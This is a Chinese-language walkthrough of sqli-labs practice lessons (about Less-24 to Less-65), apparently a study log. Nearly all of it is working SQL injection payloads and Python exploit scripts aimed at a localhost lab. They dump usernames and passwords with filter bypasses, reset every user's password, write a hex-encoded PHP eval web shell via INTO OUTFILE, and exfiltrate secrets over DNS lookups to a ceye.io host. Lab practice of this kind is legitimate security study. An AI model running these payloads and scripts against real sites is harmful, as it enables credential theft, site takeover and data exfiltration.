select *,* from XX where id = '1'-- -' LIMIT 0,1

''
->
ok
select *,* from XX where id = '''' LIMIT 0,1

1''
->
ok

1#
->
ok

'1' and 0--+
->
1' and 0 ' LIMIT 0,1
select *,* from XX where id = '    '1' and 0--+' LIMIT 0,1

过滤注释，bypass：
select *,* from XX where id = '
' or 1 union select 1,2,'3
' LIMIT 0,1

1' union 1,2,3||'1
select *,* from XX where id = '
1' union 1,2,3||'1
' LIMIT 0,1

利用：
报错：
1' union select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)),2,3||'1

时间：
' or 1 union select (select sleep(1) from (select 1,2)x where length(database())=7),2,'3

代码

from requests import *
import re

for i in range(256):
    row = "0' oorr 1 oorr '"
    row = row.replace(' ','%%%x' %(i))
    html = get("http://localhost/sqllab/Less-26/?id="+row).text
    print re.findall('result:(.+)</font> ',html)[0]
    if 'Dumb' in html:
        print row
        print html

Day24-Less24

分析

UPDATE table SET password = '' WHERE username = '' and password = ''
INSERT INTO("username","password") VALUES('2','1');

1') or 1#
1" or 1#

1")#
INSERT INTO("username","password") VALUES('','1');


select (updatexml(1,concat('*',(select username from security.users limit 0,1)),1)) from (select 1,2)x
注册一个用户：
' or 1 or '
密码为 hack
然后修改密码为 hackme，提交后数据库全部的用户密码都为 hackme
UPDATE table SET password = 'hackme' WHERE username = '
' or 1 or '
'  and password = ''
比较奇怪的地方是，这样修改的时候，后台貌似能检测到，看了一下源码，有以下判断：
$row = mysql_affected_rows();
if($row==1)
那就能解释这个问题了
但是 即使返回了错误页面，数据库实际上已经执行了


假如你知道管理员的账号，那么你可以注册一个
admin'#，密码为 troy
然后登陆修改密码
UPDATE table SET password = 'troy' WHERE username = 'admin'#' and password = 'troy'
实现重置管理员密码

用户名密码字段长度限制，没法再深入
' or 1 or '就占用 11 个字符了，只剩 9 个字符可用，database()都有 10 个字符

Day25-Less25

分析

0'|(select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)--+
password 中的 or 被过滤成 passwd，报错
Unknown column 'passwd' in 'field list'
改成下面就 ok 了

0'|(select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select passwoorrd from security.users limit 0,1)),1)) from (select 1,2)x)--+

还可以：
0' oorr (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select passwoorrd from security.users limit 0,1)),1)) from (select 1,2)x)--+

利用的话
0' union select 1,2,group_concat(username,'*',passwoorrd,'<br>') from users--+

Day26-Less25a

分析

数字型
盲注
基于错误：
0 oorr length(database())=7

时间：
1 aandnd (select sleep(1) from (select 1,2,3 )x where length(database())=8)

其他利用
0 union select 1,2,group_concat(username,'*',passwoorrd,'<br>') from users

Day27-Less26

分析

select *,* from XX where id = '$id' LIMIT 0,1

1'
->
'1'' LIMIT 0,1
select *,* from XX where id = '1'' LIMIT 0,1

'1'
->
1'' LIMIT 0,1
select *,* from XX where id = ''1'' LIMIT 0,1


select *,* from XX where id = '0' or 1 or '' LIMIT 0,1

基于报错：
0%27%a0oorr%a0length(database())=8%a0oorr%a0%27
1%27%a0aandnd%a0(select%a0(updatexml(1,concat(%27|%27,(select%a0username%a0from%a0security.users%a0limit%a00,1),%27<>%27,(select%a0passwoorrd%a0from%a0security.users%a0limit%a00,1)),1))%a0from%a0(select%a01,2)x)%a0oorr%a0%27

或者
0'%a0union%a0select%a01,2,group_concat(username,'<>',passwoorrd,'<br>')%a0from%a0users%a0where%a0'1


select *,* from XX where id = '0' or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'<>',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '' LIMIT 0,1

代码

from requests import *
import re

for i in range(256):
    row = "0' oorr 1 oorr '"
    row = row.replace(' ','%%%x' %(i))
    html = get("http://localhost/sqllab/Less-26/?id="+row).text
    print re.findall('result:(.+)</font> ',html)[0]
    if 'Dumb' in html:
        print row
        print html

Day28-Less26a

分析

0%27%a0oorr%a01%a0oorr%a0%27

基于错误
0%27%a0oorr%a0length(database())=7%a0oorr%a0%27

这个没报错
1')%a0union%a0select%a01,2,3%a0from%a0users%a0where%a0('1
即
1') union select 1,2,3 from users where ('1

所以可以利用如下
0%27)%a0union%a0select%a01,2,group_concat(username,%27*%27,passwoorrd,%27%3Cbr%3E%27)%a0from%a0users%a0where%a0(%271
即
0') union select 1,2,group_concat(username,'<>',password,'<br>') from users where ('1


应该有个判断，如果有错误也不抛异常
比如下面这句是 gg 的
1')  and  (select  (updatexml(1,concat('|',(select   username   from   security.users   limit   0,1),'',(select   password   from   security.users   limit   0,1)),1))  from  (select   1,2)x)  or  ('0

代码

from requests import *
import re

#for i in range(256):
    #row = "0' oorr 1 oorr '"
    #row = row.replace(' ','%%%x' %(i))
    #html = get("http://localhost/sqllab/Less-26a/?id="+row).text
    #print re.findall('result:(.+)</font> ',html)[0]
    #if 'Dumb' in html:
        #print row
        #print html


row = "0') or (select (updatexml(1,concat('|',(select username from security.users limit 0,1),'<>',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or ('"
row = row.replace(' ','%a0').replace('or','oorr')

html = get("http://localhost/sqllab/Less-26a/?id="+row).text
print html
print 'XPATH' in html
print row```

## Day29-Less27
### 分析

只过滤了空格以及 union、select, sql 大小写不敏感，随便大写一下就过了，空格用 %a0
或者多嵌套几层
0" uunionnion seseleselectctlect 1,2,group_concat(username,'<>',password,'
') from users where "1
select 貌似过滤了几次，要多嵌套几层

EXEC('se'+'lect'+'* from users;' )

很简单：
0' or (selecT (updatexml(1,concat('|',(selecT username from security.users limit 0,1),'<>',(selecT password from security.users limit 0,1)),1)) from (selecT 1,2)x) or '

当然也有：
0' unioN selecT 1,2,group_concat(username,'<>',password,'
') from users where '1

和前几题一样的

### 代码
```python
from requests import *
import re

#for i in range(256):
    #row = "0' or 1 or '"
    #row = row.replace(' ','%%%x' %(i))
    #html = get("http://localhost/sqllab/Less-27/?id="+row).text
    #print re.findall('result:(.+)</font> ',html)[0]
    #if 'Dumb' in html:
        #print row
        #print html


row = "0' unioN selecT 1,2,group_concat(username,'<>',password,'<br>') from users where '1"
row = row.replace(' ','%a0')

html = get("http://localhost/sqllab/Less-27/?id="+row).text
print html
print 'XPATH' in html
print row```

## Day30-Less27a
### 分析

对比 27，只是单引号改为双引号，而且不显示具体错误，其他一样的
既然屏蔽错误显示，报错注入当然也就不能用了

### 代码
```python
from requests import *
import re

row = "0\" unioN selecT 1,2,group_concat(username,'<>',password,'<br>') from users where \"1"
row = row.replace(' ','%a0')

html = get("http://localhost/sqllab/Less-27a/?id="+row).text
print html
print 'Dumb' in html
print row```

## Day31-Less28
### 分析

加了圆括号，其他没变
0') union select 1,2,group_concat(username,'<>',password,'
') from users where ('1

### 代码
```python
from requests import *
import re

row = "0') union select 1,2,group_concat(username,'<>',password,'<br>') from users where ('1"
row = row.replace(' ','%a0')

html = get("http://localhost/sqllab/Less-28/?id="+row).text
print html
print 'Dumb' in html
print row

Day32-Less28a

分析

连空格都没过滤，，，，emmmmm  比起前几题很简单了，随便过

代码

from requests import *
import re

row = "0') union select 1,2,group_concat(username,'<>',password,'<br>') from users where ('1"
row = row.replace(' ','%a0')

html = get("http://localhost/sqllab/Less-28a/?id="+row).text
print html
print 'Dumb' in html
print row```

## Day33-Less29
### 分析

这题应该用 login.php 来玩
index.php 没啥用啊

这题第一次接触的时候没审计代码怕是过不去
首先能猜出后面只允许数字过，剩下的就都不知道了

审计代码发现，先过一个 java_implimentation，把第一个叫 id 的参数拿出来，然后，把这个参数扔到 whitelist 的白名单过滤
但是，\(id=\)_GET['id'];取得却是最后一次出现的 id，，也就是说，对于第二个出现的 id，毫无过滤。所以可以这样
?id=1&id=1'
就可以看到报错了
'1'' LIMIT 0,1
接下来该干啥干啥
select XX,XX,XX from XXX where id='' LIMIT 0,1

select XX,XX,XX from XXX where id='
0' union select 1,2,group_concat(username,'<>',password,'
') from users where '1
' LIMIT 0,1

?id=1&id=0' union select 1,2,group_concat(username,'<>',password,'
') from users where '1

### 代码
```python
from requests import *
import re

row = "1&id=0' union select 1,2,group_concat(username,'<>',password,'<br>') from users where '1'--+"
row = row.replace(' ','%a0')

html = get("http://localhost/sqllab/Less-29/login.php?id="+row).text
print html

Day34-Less30

分析

与 29 相比，单引号改为双引号，其他一样
?id=1&id=0" union select 1,2,group_concat(username,'<>',password,'<br>') from users where "1

Day35-Less31

分析

与 30 相比，加了括号，其他一样
?id=1&id=0") union select 1,2,group_concat(username,'<>',password,'<br>') from users where ("1

Day36-Less32

分析

0' union select 1,2,group_concat(username,CHAR(61),password) from users--+

利用宽字节注入。
' -> %d6'

代码

from requests import *
import re

row = "0' union select 1,2,group_concat(username,CHAR(61),password) from users--+"
row = row.replace('\'','%d6\'')

html = get("http://localhost/sqllab/Less-32/?id="+row).text
print html
print 'Dumb' in html
print row```

## Day37-Less33
### 分析

和 32 一样

## Day38-Less34
### 分析

如果报编码错误，那就运行一下这个：
alter table users convert to character set gbk;

0' union select 1,group_concat(username,CHAR(61),password) from users#

### 代码
```python
from requests import *
import re

pdata = {
'uname': 'Dhakkan',
'passwd' : "0\xd6' union select 1,group_concat(username,CHAR(61),password) from users#"
}

html = post("http://localhost/sqllab/Less-34/", data = pdata).text
print html
print 'Dumb' in html

Day39-Less35

分析

数值型

0 union select 1,2,group_concat(username,CHAR(61),password) from users

Day40-Less36

分析

依然可用宽字节
0%d6\' union select 1,2,group_concat(username,CHAR(61),password) from users--+

Day41-Less37

分析

和 34 一毛一样
0\xd6' union select 1,group_concat(username,CHAR(61),password) from users#

代码

from requests import *
import re

pdata = {
'uname': 'Dhakkan',
'passwd' : "0\xd6' union select 1,group_concat(username,CHAR(61),password) from users#"
}

html = post("http://localhost/sqllab/Less-37/", data = pdata).text
print html
print 'Dumb' in html

Day42-Less38

分析

Stacked injections:堆叠注入
就是多条语句，利用分号隔开
这题没有更好的场景，显得有点鸡肋
0' union select 1,2,group_concat(username,CHAR(61),password) from users--+
注入一句话倒是不错

Day43-Less39

分析

同 38
0 union select 1,2,group_concat(username,CHAR(61),password) from users--+

Day44-Less40

分析

同 38
0') union select 1,2,group_concat(username,CHAR(61),password) from users--+

Day45-Less41

分析

同 38
0 union select 1,2,group_concat(username,CHAR(61),password) from users--+

Day46-Less42

分析

报错在登录的时候可以爆出

pdata = {
'login_user': '1',
'login_password' : "' union select 1,2,3 from users where extractvalue(1,concat('*',(select group_concat(username,'<>',password,'<br>') from users)))#",
}
不过返回的时候 XPATH syntax error 有截断，遍历一下就 OK 了：
ERROR 1105 (HY000): XPATH syntax error: 'Dumb<>Dumb<br>,Angelina<>I-kill-'
或者利用 concat 一个一个搞也行

这种情况下，不需要知道用户名
还可以这样
1';SELECT 0x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e into outfile 'D://wamp//www//web.php'#

代码

from requests import *
import re

pdata = {
'login_user': '1',
'login_password' : "1';SELECT 0x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e into outfile 'D://wamp//www//web.php'#",
}

html = post("http://localhost/sqllab/Less-42/login.php", data = pdata).text
print html
print 'Dumb' in html

Day47-Less43

分析

同 42
加了括号
') union select 1,2,3 from users where extractvalue(1,concat('*',(select group_concat(username,'<>',password,'<br>') from users)))#

Day48-Less44

分析

基于时间
pdata = {
'login_user': '1',
'login_password' : "1' and (select sleep(2) from (select 1,2)x where length(database())=8)#",
}


不过这题可以重置所以用户的密码：
pdata = {
'login_user': '1',
'login_password' : "1' or '1' limit 1,1#",
}

来个更刺激的
' union select 1,group_concat(username,'=',password,'<br>'),3 from users#



select id,username,password from XXXX where username='1' and password='' union select 1,group_concat(username,'=',password,'<br>'),3 from users#' limit 0,1

代码

from requests import *
import re

pdata = {
'login_user': '1',
'login_password' : "' union select 1,group_concat(username,'=',password,'<br>'),3 from users#",
}

html = post("http://localhost/sqllab/Less-44/login.php", data = pdata).text
print html
print 'Dumb' in html

Day49-Less45

分析

和 44 一样，加了括号而已
') union select 1,group_concat(username,'=',password,'<br>'),3 from users#

代码

from requests import *
import re

pdata = {
'login_user': '1',
'login_password' : "') union select 1,group_concat(username,'=',password,'<br>'),3 from users#",
}

html = post("http://localhost/sqllab/Less-45/login.php", data = pdata).text
print html
print 'Dumb' in html

Day50-Less46

分析

sort 注入
1. 利用 rand(ture)和 rand(false)的结果不一样
?sort=rand(length(database())=7)
?sort=rand(length(database())=8)

2. 报错注入
?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))
1 and (extractvalue(rand(),concat(0x3a,version())),1)

3. 延时注入
1 and (select sleep(1) from (select 1,2)x where length(database())=8)

4.其他
into outfile 啥的，都行

Day51-Less47

分析

与 46 相比，无法使用 rand 以外，其他都一样

Day52-Less48

分析

数字型
错误被屏蔽，延时注入即可

Day53-Less49

分析

与 48 一样，只不过是单引号型
1' and (select sleep(1) from (select 1,2)x where length(database())=8)--+

Day54-Less50

分析

堆叠注入
但是可以用前面几题过
0 or (select (extractvalue(rand(),concat(0x3a,version())),1))--+
?sort=1 and (select sleep(1) from (select 1,2)x where length(database())=8)--+

Day55-Less51

分析

和 50 一样，加了单引号

1' and (select sleep(1) from (select 1,2)x where length(database())=7)--+
0' or (select (extractvalue(rand(),concat(0x3a,version())),1))--+

Day56-Less52

分析

盲注
?sort=1 and (select sleep(1) from (select 1,2)x where length(database())=8)--+

Day57-Less53

分析

和 52 一样，加了引号而已

?sort=1' and (select sleep(1) from (select 1,2)x where length(database())=8)--+

Day58-Less54

分析

开始有意思了，限制查询 10 次
第一次
?id=1 正常
?id=1' 不正常，没报错
?id=1' or 1--+  正常
由于已知 databasename 是 challenges
那就先搞表名
?id=0' union select 1,2,group_concat(table_name,'<>',column_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges'--+
返回为

Your Login name:2
Your Password:35fb3t92ky<>id
,35fb3t92ky<>sessid
,35fb3t92ky<>secret_LKVY
,35fb3t92ky<>tryy

可以看到，表名为 at4bwg0te1，有 4 列：
id  sessid  secret_LKVY  tryy

?id=0' union select 1,2,group_concat(id,'<>',sessid,'<>',secret_LKVY,'<>',tryy,'<br>') from challenges.35fb3t92ky--+

代码

from requests import *
from re import *

def GetTableName():
    gdata = {
        'id': "0' union select 1,2,group_concat('=>',table_name,'<>',column_name,'\n') from information_schema.COLUMNS where TABLE_SCHEMA='challenges'#"
    }

    r = get('http://localhost/sqllab/Less-54/index.php', params = gdata)
    html = r.text
    return findall(r'=>([a-z0-9]+)<>(.+)\n', html)

def GetColumnName(q,tablename):
    gdata = {
        'id': "0' union select 1,2,group_concat('=>',%s,'\n') from challenges.%s#" %(q,tablename)
    }
    r = get('http://localhost/sqllab/Less-54/index.php', params = gdata)
    html = r.text
    return findall(r'=>(.+)<>(.+)<>(.+)<>(.+)\n', html)[0]


table = GetTableName()
tableName = table[0][0]
columns = '  [-]'+'\n  [-]'.join(i[1] for i in table)
print '[+]TableName:', tableName
print '[+]CotablenamelumnsNames:\n', columns

q = ",'<>',".join(i[1] for i in table)
data = GetColumnName(q,tableName)

print '[!]Password is:', data[2]```

## Day59-Less55
### 分析

和 54 一样，只不过加了括号以及是数字型
0) union select 1,2,group_concat(table_name,'<>',column_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges' or (0

?id=0) union select 1,2,group_concat(id,'<>',sessid,'<>',secret_25UU,'<>',tryy,'
') from challenges.e2du3yn5gq where (1

## Day60-Less56
### 分析

和前 2 题一样的套路
?id=0') union select 1,2,group_concat(table_name,'<>',column_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges'--+

?id=0') union select 1,2,group_concat(id,'<>',sessid,'<>',secret_ZV9U,'<>',tryy,'
') from challenges.7j9km4qsh7--+

## Day61-Less57
### 分析

和前 3 题一样的套路
?id=0" union select 1,2,group_concat(table_name,'<>',column_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges'--+

?id=0" union select 1,2,group_concat(id,'<>',sessid,'<>',secret_ZV9U,'<>',tryy,'
') from challenges.7j9km4qsh7--+

## Day62-Less58
### 分析

?id=0' or (extractvalue(rand(),(select group_concat('->',table_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0' or (extractvalue(rand(),(select group_concat(column_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0' or (extractvalue(rand(),(select group_concat('<>',secret_2EOZ) from challenges.ae85jljdmd)))--+

## Day63-Less59
### 分析

和 58 一样，不过是数字型
?id=0 or (extractvalue(rand(),(select group_concat('->',table_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0 or (extractvalue(rand(),(select group_concat(column_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0 or (extractvalue(rand(),(select group_concat('<>',secret_6GBR) from challenges.pebeduo6fx)))--+

## Day64-Less60
### 分析

和 58 一样，不过是双引号加括号
?id=0") or (extractvalue(rand(),(select group_concat('->',table_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0") or (extractvalue(rand(),(select group_concat(column_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0") or (extractvalue(rand(),(select group_concat('<>',secret_QIN6) from challenges.ortaw2xc59)))--+

## Day65-Less61
### 分析

和 58 一样，不过是单引号加双括号
?id=0')) or (extractvalue(rand(),(select group_concat('->',table_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0')) or (extractvalue(rand(),(select group_concat(column_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0')) or (extractvalue(rand(),(select group_concat('<>',secret_VSZ6) from challenges.est6bn4mqy)))--+

## Day66-Less62
### 分析

盲注
交给 py 去做吧

不过次数应该会大于 130
找到了一个更好的办法，DNS 解析
SELECT LOAD_FILE(CONCAT('\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.xxxxxx.ceye.io\abc'))

所以可以构造
http://localhost/sqllab/Less-62/?id=1') and if((SELECT LOAD_FILE(CONCAT('\\',(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' limit 0,1),'.xxxxxx.ceye.io\abc'))),1,1)--+

得到
q1bcv0fqh9.xxxxxx.ceye.io

继续，得到表名
http://localhost/sqllab/Less-62/?id=1') and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT column_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' and column_NAME like 'sec%' limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+

继续，得到 key
http://localhost/sqllab/Less-62/?id=1') and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT secret_T82V FROM challenges.q1bcv0fqh9 limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+

emm
有点开挂的赶脚..

### 代码
```python
from requests import get
from string import ascii_letters, digits

def GuessTBNameLenth(n, name):
    global guessTime
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        guessTime += 1
        r = get("http://localhost/sqllab/Less-62/?id=') or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+" %(name,n,i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    global guessTime
    no = 0
    name = ''
    length = GuessTBNameLenth(no, DBName)
    print '  [-]Guessing Table Name'
    for i in xrange(length):
        for n in ascii_letters+digits:
            guessTime += 1
            r = get("http://localhost/sqllab/Less-62/?id=') or SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1)='%s' --+" %(DBName,no,i+1,n))
            html = r.text
            if 'Your Login name' in html:
                name += n
                print '    [-]', name
                break

    print '  [-]Tables Names is:', name
    return name

def GuessCLMNum(tname,dname):
    global guessTime
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        guessTime += 1
        r = get("http://localhost/sqllab/Less-62/?id=') or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+" %(i,tname,dname))   
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Colunm num is', i
            return i
        i+=1    

def GuessCLMLen(cnum, tname, dname):
    global guessTime
    i = 7
    while 1:
        guessTime += 1
        r = get("http://localhost/sqllab/Less-62/?id=') or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+" %(tname,dname,cnum,i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, tname):
    global guessTime

    print '[+]Guessing Colunms for', tname
    cnum = 2 #No.3
    length = GuessCLMLen(cnum, tname, DBName)
    name = 'secret_'
    for i in xrange(7,length):
        for n in ascii_letters+digits:
            guessTime += 1
            r = get("http://localhost/sqllab/Less-62/?id=') or SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1)='%s' --+" %(tname,DBName,cnum,i+1,n))
            html = r.text
            if 'Your Login name' in html:
                name += n
                print '    [-]', name
                break

    data = GuessDatas(DBName, tname, name)
    print '  [-]The Colunms are',name

def GuessDatasnum(dname, tname, cname):
    global guessTime
    i = 0
    while 1:
        guessTime += 1
        r = get("http://localhost/sqllab/Less-62/?id=') or %d=(SELECT count(%s) FROM %s.%s) --+" %(i,cname,dname,tname))   
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    global guessTime
    print '    [-]Guessing data length'
    i = 1
    while 1:
        guessTime += 1
        r = get("http://localhost/sqllab/Less-62/?id=') or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+" %(cname, dname, tname, n, i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    global guessTime
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in ascii_letters+digits:
                while 1:
                    try:
                        guessTime += 1
                        r = get("http://localhost/sqllab/Less-62/?id=') or SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)='%s' --+" %(cname, dname, tname, no,i+1,n))
                        break
                    except:
                        print 'Relaxing...'
                html = r.text
                if 'Your Login name' in html:
                    name += n
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data

guessTime = 0          
DBName = 'challenges'
TBsNum = 1
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'
print guessTime```

## Day67-Less63
### 分析

和 62 一样，要么盲注，要么 DSN

?id=1' and if((SELECT LOAD_FILE(CONCAT('\\',(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' limit 0,1),'.xxxxxx.ceye.io\abc'))),1,1)--+

得到 ud7yymnibx

?id=1' and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT column_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' and column_NAME like 'sec%' limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+

得到 secret_5YDC

?id=1' and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT secret_5YDC FROM challenges.ud7yymnibx limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+

## Day68-Less64
### 分析

和 62 一样，要么盲注，要么 DSN

?id=1)) and if((SELECT LOAD_FILE(CONCAT('\\',(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' limit 0,1),'.xxxxxx.ceye.io\abc'))),1,1)--+

得到 ex06wyovlw

?id=1)) and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT column_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' and column_NAME like 'sec%' limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+

得到 secret_G074

?id=1)) and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT secret_G074 FROM challenges.ex06wyovlw limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+

## Day69-Less65
### 分析

和 62 一样，要么盲注，要么 DSN

?id=1") and if((SELECT LOAD_FILE(CONCAT('\\',(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' limit 0,1),'.xxxxxx.ceye.io\abc'))),1,1)--+

得到 gfpke05sif

?id=1") and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT column_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' and column_NAME like 'sec%' limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+

得到 secret_SWQ8

?id=1") and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT secret_SWQ8 FROM challenges.gfpke05sif limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+
```

心得

sql 注入不仅仅局限于某种姿势，只有触类旁通才能熟练掌握
做这个 lab 的时候要手工注入，或者自己写脚本，不要用 sqlmap 之类的

来呀快活呀